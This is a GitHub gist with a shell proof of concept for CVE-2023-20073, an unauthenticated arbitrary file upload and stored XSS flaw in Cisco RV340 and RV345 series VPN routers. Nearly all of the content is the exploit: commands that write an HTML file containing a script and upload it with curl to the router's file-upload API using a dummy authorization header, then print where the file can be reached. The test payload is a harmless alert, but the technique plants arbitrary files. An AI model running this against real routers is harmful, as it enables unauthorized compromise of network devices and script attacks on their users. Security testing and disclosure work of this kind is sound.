Created
August 18, 2023 16:56
-
-
Save win3zz/076742a4e365b1bba7e2ba0ebea9253f to your computer and use it in GitHub Desktop.
Unauthenticated Arbitrary File Upload and Stored XSS in Cisco RV340, RV340W, RV345, RV345P VPN Routers (CVE-2023-20073)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
TARGET="https://0.0.0.0"; \ | |
FILENAME="login.html"; \ | |
echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \ | |
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \ | |
echo "Access the uploaded file through the following link: $TARGET/$FILENAME" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment